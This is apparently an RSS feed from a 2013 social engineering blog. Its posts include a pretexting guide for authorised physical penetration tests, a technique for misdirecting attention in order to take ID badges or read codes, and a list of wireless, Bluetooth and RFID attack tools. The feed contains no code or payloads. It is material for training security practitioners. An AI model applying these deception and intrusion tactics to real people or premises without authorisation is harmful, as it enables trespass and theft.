<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Subliminal Hacking</title>
	<atom:link href="http://www.subliminalhacking.net/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.subliminalhacking.net</link>
	<description>The Art and Science of Social Engineering</description>
	<lastBuildDate>Wed, 22 May 2013 18:41:26 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Derren Brown&#8217;s Infamous Tour &#8230; Awesome Sauce!</title>
		<link>http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/</link>
		<comments>http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/#comments</comments>
		<pubDate>Wed, 22 May 2013 11:37:22 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Review]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Andy Nyman]]></category>
		<category><![CDATA[breaking]]></category>
		<category><![CDATA[Cold Reading]]></category>
		<category><![CDATA[Derren Brown]]></category>
		<category><![CDATA[Hypnosis]]></category>
		<category><![CDATA[Infamous]]></category>
		<category><![CDATA[Mentalism]]></category>
		<category><![CDATA[New Alexandra Theatre Birmingham]]></category>
		<category><![CDATA[Psychic]]></category>
		<category><![CDATA[review]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1715</guid>
		<description><![CDATA[Last night (21st May 2013) was that special time again when I headed off to see a new offering from the master that is Derren Brown, this time wrapped up in his new stage show Infamous at the New Alexandra Theatre Birmingham. I should say two things before I continue, if you know me or [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.subliminalhacking.net/wp-content/uploads/2013/05/DB-Infamous.jpg"><img class="aligncenter  wp-image-1716" alt="DB-Infamous" src="http://www.subliminalhacking.net/wp-content/uploads/2013/05/DB-Infamous.jpg" width="256" height="363" /></a></p>
<p style="text-align: left;">Last night (21st May 2013) was that special time again when I headed off to see a new offering from the master that is Derren Brown, this time wrapped up in his new stage show Infamous at the New Alexandra Theatre Birmingham. I should say two things before I continue, if you know me or you read this blog already you will know I am a little biased towards Mr Brown, I am a big fan of pretty much all he has done. Also as with all his shows, he does request no specific spoilers so everyone gets the full viewing experience.</p>
<p style="text-align: left;">Now I have seen everything Derren has done, both a combination on TV and in person. I love it all, the new stuff we see on TV lately is very different to the older stuff like Mind Control, but different isn&#8217;t bad, its well different. I think it aims to expose the viewer to different perspectives, as well as giving the people that participate a potentially life changing experience. However seeing Derren in anything live for me is really where you see him in top form, and Infamous really didn&#8217;t disappoint, and as much as I loved Enigma and Svengali I really appreciated Andy Nyman being back on the scene. I guess with that its no surprise I thought Infamous&#8217;s feel and production was more like the older shows &#8220;Something Wicked This Way Comes&#8221; and &#8220;An Evening of Wonders&#8221;, and for me this is much more how I like it. Essentially its Derren properly wowing us with himself, less props more mental mojo and dexterity.</p>
<p style="text-align: left;">This entire performance felt alot more personal, with Derren sharing what seemed some personal and emotional thoughts and experiences  as well as some very motivational take aways, all very inspiring indeed. The set background was very impressive, in some ways it was simplistic but really added to the effect and feel of the show. This show also included alot more audience participation that the last few which is awesome, and as I mentioned before you really get (in my mind) more first hand exposure to the processes and techniques that first made everyone aware of Derren&#8217;s skills all those years ago, as well as those opinions and experiences he has brought to TV of late. What you are constantly reminded of every time you see Derren is how much of a professional he is, hes ability to manage the audience, perfection in his presentation and skills, and also how personable he can be, but also a great sense of humour.</p>
<p style="text-align: left;">I know its abit vague (aka no spoilers), but when you go see this show you will not be disappointed  So many draw dropping moments, and even if you have an understanding for the techniques Derren employs (Hypnosis, Sleight of Hand, Mentalism, Sudo Psychic stuffs), I guarantee there will be many times where you think to yourself, how the hell did he just achieve that. Save the tracking back until later though, or you will miss more opportunities to be amazed. As always I left the show inspired even more to continue to develop both my skills, but also myself and others.</p>
<p style="text-align: left;">Enjoy the show, and as always leave comments.</p>
<p style="text-align: left;">
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Longlining &#8230; The 2013 Social Engineering Threat</title>
		<link>http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/</link>
		<comments>http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/#comments</comments>
		<pubDate>Fri, 10 May 2013 12:23:01 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[longlining]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[proofpoint]]></category>
		<category><![CDATA[spotlight]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1703</guid>
		<description><![CDATA[I came across another great InfoGraph today from proofpoint on &#8220;Longlining&#8221; and I thought I would share it. This approach uses more targeted phishing emails along with various techniques in an attempt to avoid detection. ]]></description>
				<content:encoded><![CDATA[<p style="text-align: left;">I came across another great InfoGraph today from proofpoint on &#8220;Longlining&#8221; and I thought I would share it. This approach uses more targeted phishing emails along with various techniques in an attempt to avoid detection. <a href="http://www.subliminalhacking.net/wp-content/uploads/2013/05/Longlining-Infographic.jpg"><br />
<img class="aligncenter  wp-image-1707" alt="Longlining-Infographic" src="http://www.subliminalhacking.net/wp-content/uploads/2013/05/Longlining-Infographic.jpg" width="640" height="2566" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Whats my motivation darling? &#8230; The Pretext</title>
		<link>http://www.subliminalhacking.net/2013/03/24/whats-my-motivation-darling-the-pretext/</link>
		<comments>http://www.subliminalhacking.net/2013/03/24/whats-my-motivation-darling-the-pretext/#comments</comments>
		<pubDate>Sun, 24 Mar 2013 12:16:56 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Manipulation]]></category>
		<category><![CDATA[Misdirection]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[get in character]]></category>
		<category><![CDATA[Motivation]]></category>
		<category><![CDATA[Pretext]]></category>
		<category><![CDATA[pretexting]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1679</guid>
		<description><![CDATA[There are many essential skills required to be successful at social engineering, and one we have mentioned before but never really gone into is Pretexting. The easiest way I find to describe a pretext is to consider the motivation for an actor. When you see interviews with actors about their latest film and how they [...]]]></description>
				<content:encoded><![CDATA[<p>There are many essential skills required to be successful at social engineering, and one we have mentioned before but never really gone into is Pretexting. The easiest way I find to describe a pretext is to consider the motivation for an actor. When you see interviews with actors about their latest film and how they got into character, you will hear them talking about how they met with real life examples of their character, visited places they worked, stayed, etc. All of this is to enable them to get into the mindset of the role they are playing, what was their background, what did they experience in their life, what was their personality, their approach in life and what made them into the person they are today. They will also understand how the literally walk and talk, the body language, how they present themselves (clothes, style, attitude). This is what pretext is for a for social engineer, reaching a position to live, breath and feel in character for the position they will be looking to imply in the context of the social engineering engagement they are due to perform.</p>
<p><a href="http://www.subliminalhacking.net/wp-content/uploads/2013/03/thespian.jpg"><img class="aligncenter size-medium wp-image-1680" alt="thespian" src="http://www.subliminalhacking.net/wp-content/uploads/2013/03/thespian-300x200.jpg" width="300" height="200" /></a></p>
<p>&nbsp;</p>
<p>With all the power of the Interwebs understanding the individual or type of character is greatly reduced in effort, but to be successful it isnt just a case of reading a bio and job done. It really is important to take time to fully understand and visualise what it would be life for you to BE this character, as if you are to pull of the act successfully in a challenging situation you dont want to be pretending, you want to BE. This might seem odd, as of course you are you, and you are there on a Pentest or some other form of activity, but if you think like this and someone really challenges you on why you are doing something, you will get flustered, become unstuck, spill the beans and hand over your get out of jail free authorisation letter. However if you are acting out against your pretext the result would be different, you are not the Pentester, you are Bob the Head of Finance for ACME Inc, and when Bob is challenged from someone at reception, or any member of staff, he is not phased, as he would hope staff check people they are not familiar with, and would support it, but be very clear he is in a position of authority and should be treated accordingly.</p>
<p><em>A nice example of this is what happened to me on a physical engagement last year. The gig was going well, we had gained access to all but one of the objectives and was hunting around the facility to find its location. During the hunt we were approached and questioned by a facilities member of staff, they kindly asked what we were doing and what we were looking for. So I asked them when the location we were looking for was <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  (You dont ask you dont get). As this was a semi sensitive location they were unsure and this was obvious, so I confirmed without his need to ask why we needed to go there and what had been doing. All of this information was part of our devised cover story and formed some background of the pretext. Then he decided it would be best to call the facilities manager. OH SHIT <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  So now we crap ourselves and hand over the letter gig is up?? Nope. I encouraged him to call the guy, infact it would be good to meet him anyway, so he continued his call &#8230; &#8220;I have a couple of guys here who say they are X + Y and they need to go to Z&#8221;, few pauses, &#8220;OK I will take them there and you can meet us there? Sure. Sound good&#8221;. You might think this is crazy, but remember why wouldn&#8217;t we want to meet the manager if it was legitimate? Anyway, so the facilities guy who was very busy when we encountered him started to escort us through the building to our final objective and a meeting with the facilities manager. Cut a long story short, I had a good chat with him on route, shared some empathy around the mountain of work he seemed to have, and when we arrived at our location and the manager wasnt there, suggested we could wait here whilst he gets back to his work. He wasnt sure, I agreed might be best to wait with us, but I would understand if he needed to get back to it, and he did <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  We waited about 2 mins, then went walkabout know knowing where our final objective was for later.</em></p>
<p>What I am trying to confirm above is that if you have done your homework, and are fully acting out on your pretext you can push the boundaries further until they crack. Sure you might eventually get untangled and rumbled but it gives you alot more wiggle room. You will probably be running on adrenalin at this stage, and in the mental oh shit, oh shit loop, but if you have your motivation right you just need to rely on your skills. Essentially you are misdirecting from the issue as hand, and manipulating the situation to give yourself some options.</p>
<p>Below is my tip list on putting together your pretext, but regardless have fun with it and experiment.</p>
<ul>
<li><span style="line-height: 13px;">Keep it simple. The more complex you make it, the more stress you put yourself under, and this will make things less fluid.</span></li>
<li>Room to maneuver. Have multiple paths you can take with your pretext. If you have kids, who are they, interests, etc.</li>
<li>Dont reinvent the wheel. Regardless of your age you have alot of life experience, include some of yourself in your pretext.</li>
<li>BIG BECAUSE. Remember to have a logical reason for what you are doing. Having a reason goes a long way to implied acceptance.</li>
<li>Visualise. Mentally go through possible character interactions. How will you respond, where will that lead.</li>
<li>Accents. If you cant do them, DONT. If you accent doesn&#8217;t match your pretext, change it, or have justifiable reasoning why it doesn&#8217;t.</li>
<li>Accessorise. If your character should have certain accessories or props, have them with you. It completes the picture and reduces doubt.</li>
<li>Ad-lib. Be prepared to go off script if things get messy. However keep in context and reference to your pretext.</li>
<li>Context is key. Use your OSINT to help formulate your pretext. If the company dont have water coolers, being the water cooler guy is FAIL.</li>
</ul>
<p>I hope this information was of some interest, and will help you in your next authorised social engineering assessment.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/03/24/whats-my-motivation-darling-the-pretext/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Why Social Engineering Works &#8230; Infograph by Veracode</title>
		<link>http://www.subliminalhacking.net/2013/03/11/why-social-engineering-works-infograph-by-veracode/</link>
		<comments>http://www.subliminalhacking.net/2013/03/11/why-social-engineering-works-infograph-by-veracode/#comments</comments>
		<pubDate>Mon, 11 Mar 2013 23:56:22 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Infograph]]></category>
		<category><![CDATA[spotlight]]></category>
		<category><![CDATA[Veracode]]></category>
		<category><![CDATA[Why Social Engineering Works]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1668</guid>
		<description><![CDATA[I came across this great infograph from Veracode today on &#8220;Why Social Engineering Works&#8221;. Wish I had the time and the skill to put these infographs together, but here you go. (Its a relatively large file so please be patient while it loads) &#160;]]></description>
				<content:encoded><![CDATA[<p>I came across this great infograph from Veracode today on &#8220;Why Social Engineering Works&#8221;. Wish I had the time and the skill to put these infographs together, but here you go. <em>(Its a relatively large file so please be patient while it loads)</em></p>
<p>&nbsp;</p>
<p style="text-align: center;"><a href="http://www.subliminalhacking.net/wp-content/uploads/2013/03/socialengineering-diagram.png"><img class="aligncenter  wp-image-1669" alt="socialengineering-diagram" src="http://www.subliminalhacking.net/wp-content/uploads/2013/03/socialengineering-diagram.png" width="585" height="2720" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/03/11/why-social-engineering-works-infograph-by-veracode/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wireless Attack and Audit Tools &#8230; Recommendations List</title>
		<link>http://www.subliminalhacking.net/2013/02/07/wireless-attack-and-audit-tools-recommendations-list/</link>
		<comments>http://www.subliminalhacking.net/2013/02/07/wireless-attack-and-audit-tools-recommendations-list/#comments</comments>
		<pubDate>Thu, 07 Feb 2013 10:09:13 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Aircrack-NG]]></category>
		<category><![CDATA[aireplay-ng]]></category>
		<category><![CDATA[airodump-ng]]></category>
		<category><![CDATA[AirPCAP]]></category>
		<category><![CDATA[Airpwn]]></category>
		<category><![CDATA[Alfa AWUS036H]]></category>
		<category><![CDATA[ASLeap]]></category>
		<category><![CDATA[AVR RZ Raven]]></category>
		<category><![CDATA[BackTrack 5 Wireless Penetration Testing Guude]]></category>
		<category><![CDATA[BlueBugger]]></category>
		<category><![CDATA[BlueSnarfer]]></category>
		<category><![CDATA[bluetooth]]></category>
		<category><![CDATA[Carwhisperer]]></category>
		<category><![CDATA[Cinceptronic CBT200U2]]></category>
		<category><![CDATA[CoWPAtty]]></category>
		<category><![CDATA[Edimax EW-7811Un]]></category>
		<category><![CDATA[Elcomsoft Wireless Security Auditor]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[FreeRadius]]></category>
		<category><![CDATA[GlobalStat BU 353 GPS]]></category>
		<category><![CDATA[Immunity Silica]]></category>
		<category><![CDATA[inSSIDer]]></category>
		<category><![CDATA[Karmetasploit]]></category>
		<category><![CDATA[KillerBee]]></category>
		<category><![CDATA[KisBee]]></category>
		<category><![CDATA[kismet]]></category>
		<category><![CDATA[Linksys USBBT100]]></category>
		<category><![CDATA[MSI MS-6967]]></category>
		<category><![CDATA[packetforge-ng]]></category>
		<category><![CDATA[Proxmark3]]></category>
		<category><![CDATA[Rainbow Tables]]></category>
		<category><![CDATA[RFID]]></category>
		<category><![CDATA[Ubertooth One]]></category>
		<category><![CDATA[Wardriving]]></category>
		<category><![CDATA[WiFi Pineapple]]></category>
		<category><![CDATA[wireless attack tools]]></category>
		<category><![CDATA[wireless audits]]></category>
		<category><![CDATA[wireless hacking]]></category>
		<category><![CDATA[Wireless Hacking Exposed]]></category>
		<category><![CDATA[wireless tools]]></category>
		<category><![CDATA[Zigbee]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1619</guid>
		<description><![CDATA[Wireless recon and exploitation may not be one of the techniques that first jumps to mind when you think of Social Engineering, but its a valid attack vector for both the on premises recon and attacks (direct to the wireless infrastructure) but also clientside (attacking the host on premise and in the airport lounge). With [...]]]></description>
				<content:encoded><![CDATA[<p>Wireless recon and exploitation may not be one of the techniques that first jumps to mind when you think of Social Engineering, but its a valid attack vector for both the on premises recon and attacks (direct to the wireless infrastructure) but also clientside (attacking the host on premise and in the airport lounge).</p>
<p>With this in mind and the ever increasing usage of wireless technologies and a couple of requests from people I thought it would be a great idea to put together another recommendations list of tools, hardware and resources for anyone looking to get into wireless auditing or adding wireless attack vectors to their current attack methodology (similar to my <a title="OSINT Tools" href="http://www.subliminalhacking.net/2012/12/27/osint-tools-recommendations-list/" target="_blank">OSINT  Tools Recommendations List</a>).</p>
<p>This page will be maintained and grown over time, if you know of a good tool, decent hardware or resource please get it touch for consideration on adding it to this list.</p>
<h4>Wireless Networks</h4>
<ul>
<li><a href="http://www.aircrack-ng.org/" target="_blank">Aircrack-NG</a> - Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.</li>
<li><a href="http://www.kismetwireless.net/" target="_blank">Kismet </a>- Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.</li>
<li><a href="http://www.metageek.net/products/inssider/" target="_blank">inSSIDer</a> - inSSIDer displays all the Wi-Fi networks around you – including security information, the strength of the network, and broadcasting channel.</li>
<li><a href="http://airpwn.sourceforge.net/Airpwn.html" target="_blank">Airpwn</a> - Airpwn listens to incoming wireless packets, and if the data matches a pattern specified in the config files, custom content is injected &#8220;spoofed&#8221;.</li>
<li><a href="http://www.willhackforsushi.com/Cowpatty.html" target="_blank">CoWPAtty</a> &#8211; WPA Dictionary Attacking Tool.</li>
<li><a href="http://ettercap.github.com/ettercap/" target="_blank">Ettercap</a> &#8211; Not wireless specific but a handy tool for Man In The Middle Attacking.</li>
<li><a href="http://www.willhackforsushi.com/Asleap.html" target="_blank">ASLeap</a> &#8211; Tool for exploiting Cisco LEAP authentication.</li>
<li><a href="http://www.willhackforsushi.com/FreeRADIUS-WPE.html" target="_blank">FreeRadius</a> - A patch for the popular open-source FreeRADIUS implementation to demonstrate RADIUS impersonation vulnerabilities</li>
<li><a href="http://dev.metasploit.com/redmine/projects/framework/wiki/Karmetasploit" target="_blank">Karmetasploit</a> - Karmetasploit is a great function within Metasploit, allowing you to fake access points, capture passwords, harvest data, and conduct browser attacks against clients.</li>
<li><a href="http://www.elcomsoft.co.uk/ewsa.html" target="_blank">EWSA</a> &#8211; Elcomsoft Wireless Security Auditor allows GPU power to crack WPA.WPA2 password enabled networks.</li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.amazon.co.uk/Alfa-AWUS036H-Upgraded-Wireless-Long-Rang/dp/B000WXSO76/ref=sr_1_2?ie=UTF8&amp;qid=1360153800&amp;sr=8-2" target="_blank">Alfa AWUS036H</a> - 1000mW 1W 802.11b/g High Gain USB Wireless Long-Rang WiFi network Adapter with 5dBi Antenna.</span></li>
<li><a href="http://www.amazon.co.uk/GlobalSat-BU-353-WaterProof-Receiver-SiRF/dp/B000PKX2KA/ref=sr_1_2?ie=UTF8&amp;qid=1360156335&amp;sr=8-2" target="_blank">GlobalStat BU353 GPS</a> &#8211; USB GPS Dongle compatible with Kismet. Ideal war mapping out wireless coverage.</li>
<li><a href="http://hakshop.myshopify.com/products/wifi-pineapple" target="_blank">WiFi Pineapple</a> - Awesome one box wonder of WiFi hacking goodness.</li>
<li><a href="http://www.immunityinc.com/products-silica.shtml" target="_blank">Immunity Silica</a> - Automated wireless auditing tool.</li>
<li><a href="http://www.riverbed.com/uk/products/cascade/wireshark_enhancements/airpcap.php" target="_blank">AirPCAP</a> - Wireless Packet Capture Solution.</li>
<li><a href="http://www.amazon.co.uk/Edimax-EW-7811UN-Wireless-802-11b-150Mbps/dp/B003MTTJOY/ref=sr_1_1?ie=UTF8&amp;qid=1360973318&amp;sr=8-1" target="_blank">Edimax EW-7811Un</a> &#8211; Nano USB Wifi Adapter that supports inject.</li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.amazon.com/gp/product/1849515581/ref=as_li_qf_sp_asin_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1849515581&amp;linkCode=as2&amp;tag=sublimhackin-20">BackTrack 5 Wireless Penetration Testing Beginner&#8217;s Guide</a><img style="border: none !important; margin: 0px !important;" alt="" src="http://www.assoc-amazon.com/e/ir?t=sublimhackin-20&amp;l=as2&amp;o=1&amp;a=1849515581" width="1" height="1" border="0" /> - Great book on Wireless Pentesting with BackTrack by Vivek Ramachandran.<br />
</span></li>
<li><span style="line-height: 13px;"><a href="http://www.amazon.com/gp/product/0071666613/ref=as_li_qf_sp_asin_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=0071666613&amp;linkCode=as2&amp;tag=sublimhackin-20">Hacking Exposed Wireless, Second Edition</a><img style="border: none !important; margin: 0px !important;" alt="" src="http://www.assoc-amazon.com/e/ir?t=sublimhackin-20&amp;l=as2&amp;o=1&amp;a=0071666613" width="1" height="1" border="0" /> &#8211; The Hacking Exposed books are well known, and this one features the sushi king Josh Wright.</span></li>
<li><a href="http://blog.securityactive.co.uk/2009/07/17/wardriving-with-kismet-newcore-and-backtrack-4/" target="_blank">Wardriving with Kismet</a> &#8211; Old blog post I did on WarDriving with Kismet, still a handy reference.</li>
<li><a href="http://www.renderlab.net/projects/WPA-tables/" target="_blank">Church of Wifi </a>- WPA PSK Rainbow Tables</li>
</ul>
<h4>Bluetooth</h4>
<ul>
<li><a href="http://www.alighieri.org/tools/bluesnarfer.tar.gz" target="_blank">BlueSnarfer</a> &#8211;  Provides the ability to send and receive AT Commands from GSM extensions.</li>
<li><a href="http://packetlife.net/armory/bluebugger/" target="_blank">BlueBugger </a>- Bluetooth tool to access phonebook, messages and other AT commands from supported GSM devices.</li>
<li><a href="http://trifinite.org/trifinite_stuff_carwhisperer.html" target="_blank">CarWhisperer</a> &#8211; Provides the ability to connect to BlueTooth devices with a class of handsfree and uses default passkeys to connect.</li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.amazon.co.uk/Linksys-USBBT100-Bluetooth-USB-Adapter/dp/B0002AGEW6" target="_blank">Linksys Usbbt100</a> &#8211; Great moddable  BlueTooth dongle for hacking, not so easy to get hold of.<br />
</span></li>
<li>MSI MS-6967 &#8211; Another BlueTooth dongle that supports modding for external antenna.</li>
<li>Conceptronic CBT200U2 - Another BlueTooth dongle that supports modding for external antenna.</li>
<li><a href="http://ubertooth.sourceforge.net/" target="_blank">Ubertooth One</a> &#8211; The goto hardware for Bluetooth hacking and experimentation.</li>
</ul>
<h4>Zigbee</h4>
<ul>
<li><span style="line-height: 13px;"><a href="http://code.google.com/p/killerbee/" target="_blank">KillerBee</a> &#8211;  KillerBee is a Python based framework and tool set for exploring and exploiting the security of ZigBee and IEEE 802.15.4 networks.</span></li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.kismetwireless.net/kisbee/" target="_blank">KisBee </a>- Kisbee is a project to create a small, battery powered, open source hardware device for capturing 802.15.4 (aka Zigbee).</span></li>
<li>AVR RZ Raven &#8211; Zigbee USB Wireless that works with the KillerBee Framework.</li>
</ul>
<h4>RFID</h4>
<ul>
<li><span style="line-height: 13px;"><a href="http://proxmark3.com/" target="_blank">Proxmark3</a> - The Proxmark III is the most powerful and versatile open source device currently available for performing RFID research.</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/02/07/wireless-attack-and-audit-tools-recommendations-list/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Attention Manipulation Techniques &#8230; Natural Buffer Overflows</title>
		<link>http://www.subliminalhacking.net/2013/02/05/attention-manipulation-techniques-natural-buffer-overflows/</link>
		<comments>http://www.subliminalhacking.net/2013/02/05/attention-manipulation-techniques-natural-buffer-overflows/#comments</comments>
		<pubDate>Tue, 05 Feb 2013 15:00:49 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Manipulation]]></category>
		<category><![CDATA[Misdirection]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Attention Manipulation Techniques]]></category>
		<category><![CDATA[Bottom Up Attention]]></category>
		<category><![CDATA[Natural Buffer Overflows]]></category>
		<category><![CDATA[Prefrontal Cortex]]></category>
		<category><![CDATA[Sensory Cortices]]></category>
		<category><![CDATA[Top Down Attention]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1392</guid>
		<description><![CDATA[A key part of being a Social Engineer is being able to create yourself windows of opportunity. These may be to distract peoples attention whilst you slip past a door, pull some keys from a key cabinet, acquire an access card from a pocket and many more. Of course to achieve any of these things you can [...]]]></description>
				<content:encoded><![CDATA[<p>A key part of being a Social Engineer is being able to create yourself windows of opportunity. These may be to distract peoples attention whilst you slip past a door, pull some keys from a key cabinet, acquire an access card from a pocket and many more. Of course to achieve any of these things you can simply give it a go, cross your fingers and do your thing. Sure you might get lucky, but this is a more opportunistic approach, I would recommend you pop off your social hat for a moment and donned your engineering helmet. What do I mean? Well look to understand how we can manipulate someones attention, from both the science and artistic perspective.</p>
<p>What I am about to say may seem obvious, and in many ways it is, but when you are in the moment that awesome brain of yours goes primal and you forget the simple unless is something you have printed it in via establish learning and muscle memory, i.e. doing it lots and lots, so you dont need to think about it. Remember when you were learning to drive, the practice of approaching a roundabout, signalling, turning and changing gear resulted in a stalled vehicle and horns blaring all over the shop. This crap is impossible you though. Established learning now means you can do all of the above, speak on your mobile, check yourself out in the rearview mirror, smoke a cigarette whilst carefully resting a hot coffee between your legs.</p>
<p style="text-align: center;"><img class="aligncenter  wp-image-1403" alt="squirel" src="http://www.subliminalhacking.net/wp-content/uploads/2013/01/squirel.jpg" width="281" height="281" /></p>
<p>I digress <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  So this information is built from books I have read, but more importantly actually doing different things to prove they work and establish them as part of a built in skillset. Obviously on the job Social Engineering gigs give you this, but they are not always the best time to try them out, which is where my other past time of mentalism, hypnosis and more recently pickpocketing (all in the frame of entertainment) help and provides opportunity for me to learn and develop these skills.</p>
<p>People can be manipulated as there are two types of attention processed by the brain. There is &#8216;Top Down Attention&#8217; and &#8216;Bottom Up Attention&#8217;.</p>
<ul>
<li>Top Down Attention is classified as decision making attention. If I ask you to look down at your hands now, you are consciously making a decision to perform that action. This action uses the Prefrontal Cortex which is highly developed in humans for complex decision making.</li>
<li>Bottom Up Attention is when something grabs focus of your attention. A simple example of this is when someone calls your name, or a phone rings with your ringtone. You are drawn automatically to investigate and verify if you are the focus. This action uses a more primitive part of the brain known as the Sensory Cortices. In these regions of the brain unexpected stimulas are quickly routed in the brain to grab your focus, presumably to stop us being eaten by a lion back in the day <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </li>
</ul>
<p>Combine this with the fact that our brains really do have limited focus, such as only being able to remember 5 or so concurrent activities at a time we create a situation, that even if you are aware of how its done you just cant protect against as its just how our brain functions. Combine this with congruency to build up some yes sets</p>
<p>So next time you are trying misdirect someones attention consider the above. When you ask ask someone for the time (Top Down Attention) drop a silver coin on the floor to roll away (Bottom Up Attention) creating a small window of opportunity that you can exploit to possibly gain access to that ID Badge, or view the combination codes written on that pad.</p>
<p>Happy Social Engineering!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/02/05/attention-manipulation-techniques-natural-buffer-overflows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook Graph &#8230; Social Engineering OSINT gets Graphical</title>
		<link>http://www.subliminalhacking.net/2013/01/17/facebook-graph-social-engineering-osint-gets-graphical/</link>
		<comments>http://www.subliminalhacking.net/2013/01/17/facebook-graph-social-engineering-osint-gets-graphical/#comments</comments>
		<pubDate>Thu, 17 Jan 2013 20:21:34 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Apps My Friends Use]]></category>
		<category><![CDATA[Current Cities Of My Friends]]></category>
		<category><![CDATA[Facebook Graph]]></category>
		<category><![CDATA[Finding Relevant Info]]></category>
		<category><![CDATA[Games My Friends Play]]></category>
		<category><![CDATA[Groups My Friends Are In]]></category>
		<category><![CDATA[Microsoft Bing]]></category>
		<category><![CDATA[Movies My Friends Like]]></category>
		<category><![CDATA[Music My Friends Like]]></category>
		<category><![CDATA[nds]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[Photos I have Liked]]></category>
		<category><![CDATA[Photos of My Friends]]></category>
		<category><![CDATA[Restaurants Nearby]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1490</guid>
		<description><![CDATA[So Facebook currently have a new offering in beta form, and its called &#8216;Facebook Graph&#8217;. Woopie Doo I hear you cry, but it may actually be something to sauce up your Social Networking OSINT a little more if you are a social engineer. The aim of Facebook graph as far as I can tell is [...]]]></description>
				<content:encoded><![CDATA[<p>So Facebook currently have a new offering in beta form, and its called &#8216;Facebook Graph&#8217;. Woopie Doo I hear you cry, but it may actually be something to sauce up your Social Networking OSINT a little more if you are a social engineer.</p>
<p><img class="aligncenter size-full wp-image-1495" alt="Zuckerberg" src="http://www.subliminalhacking.net/wp-content/uploads/2013/01/Zuckerberg.png" width="291" height="170" /></p>
